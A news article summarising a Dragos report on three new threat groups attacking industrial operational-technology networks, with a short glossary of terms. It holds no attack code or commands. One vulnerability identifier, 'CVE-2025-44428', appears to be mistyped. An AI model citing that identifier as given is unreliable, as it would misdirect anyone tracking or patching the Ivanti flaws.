Attack at the Edge: How New Hacker Groups Are Breaching Industrial Defenses

In the shadows of global conflict, a new breed of cyber adversaries is quietly rewriting the rules of digital warfare. While the world’s attention has been fixed on the fallout from the Ukraine war, threat actors have pivoted their gaze - and their tools - toward the operational technology (OT) systems that underpin modern civilization. From power grids to water utilities, these newly identified hacking groups are finding fresh ways to breach the digital walls that guard the world’s most vital machinery.

Fast Facts

• Three new threat groups - Sylvanite, Azurite, and Pyroxene - have been identified targeting OT environments.
• Sylvanite specializes in initial access, exploiting edge devices to pave the way for more sophisticated attacks by allied groups.
• Azurite leverages compromised small office/home office networks to infiltrate engineering workstations using stealthy, native system tools.
• Pyroxene uses social engineering, including fake recruiter profiles, to breach targets across aerospace, defense, and maritime sectors.
• Longstanding groups like Electrum are expanding attacks into Europe and the U.S. as the cyber phase of the Ukraine war wanes.

Dragos, an industrial cybersecurity firm, has sounded the alarm on an evolving threat landscape. Their latest report details how three new hacking groups are not just targeting but actually enabling access to OT environments - the networks that control everything from electricity to transportation. The stakes couldn’t be higher: successful attacks here can cause real-world chaos, not just stolen data.

The first group, Sylvanite, has emerged as a specialist in breaching the perimeter. Unlike traditional hackers who seek to remain embedded for extended espionage, Sylvanite’s role is surgical: exploit vulnerabilities in edge devices (hardware that connects OT to the internet), then hand off access to bigger players. Their handiwork was evident in a May 2025 breach at a U.S. utility, where flaws in Ivanti Endpoint Manager Mobile (including the newly catalogued CVE-2025-4427 and CVE-2025-44428) were used as a digital crowbar.

Once the doors are opened, groups like Voltzite - linked to the notorious Volt Typhoon - move in for long-term control. The collaboration is clear: Sylvanite is the locksmith, Voltzite the burglar.

Azurite, another fresh face, blends in by exploiting compromised home and small business networks as launchpads. Their specialty: “living-off-the-land” techniques, using legitimate system tools to avoid detection while targeting engineering workstations inside industrial networks.

Meanwhile, Pyroxene is perfecting the art of deception. By posing as recruiters on platforms like LinkedIn, they lure employees into unwittingly opening the gates. Their reach has expanded rapidly from the Middle East into North America and Europe, and they’ve already deployed destructive wiper malware against strategic targets during recent conflicts.

These new attackers don’t operate in a vacuum. Veteran groups such as Kamacite and Electrum - infamous for the 2015 takedown of Ukraine’s power grid - are ramping up operations, targeting supply chains and renewable energy installations in Europe. The December blackout in Poland, which affected wind and solar facilities, bore their signature. As global tensions shift, so too do the priorities of these cyber mercenaries, with U.S. and European infrastructure now firmly in the crosshairs.

The message is clear: as geopolitical cyberwars ebb and flow, the world’s OT environments are becoming the new frontline. The attackers are more specialized, more coordinated, and more ambitious than ever. For defenders, vigilance at the digital edge is no longer optional - it’s a necessity for national security.

WIKICROOK

• Operational Technology (OT): Operational Technology (OT) includes computer systems that control industrial equipment and processes, often making them more vulnerable than traditional IT systems.
• Edge Devices: Edge devices are internet-facing hardware like firewalls or VPNs that control access between internal networks and the outside world, making them prime security targets.
• Living: Living off the Land means attackers use trusted system tools (LOLBins) for malicious actions, making their activities stealthy and hard to detect.
• Wiper Malware: Wiper malware is malicious software that permanently deletes or corrupts files, making recovery impossible and causing severe data loss or system disruption.
• Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.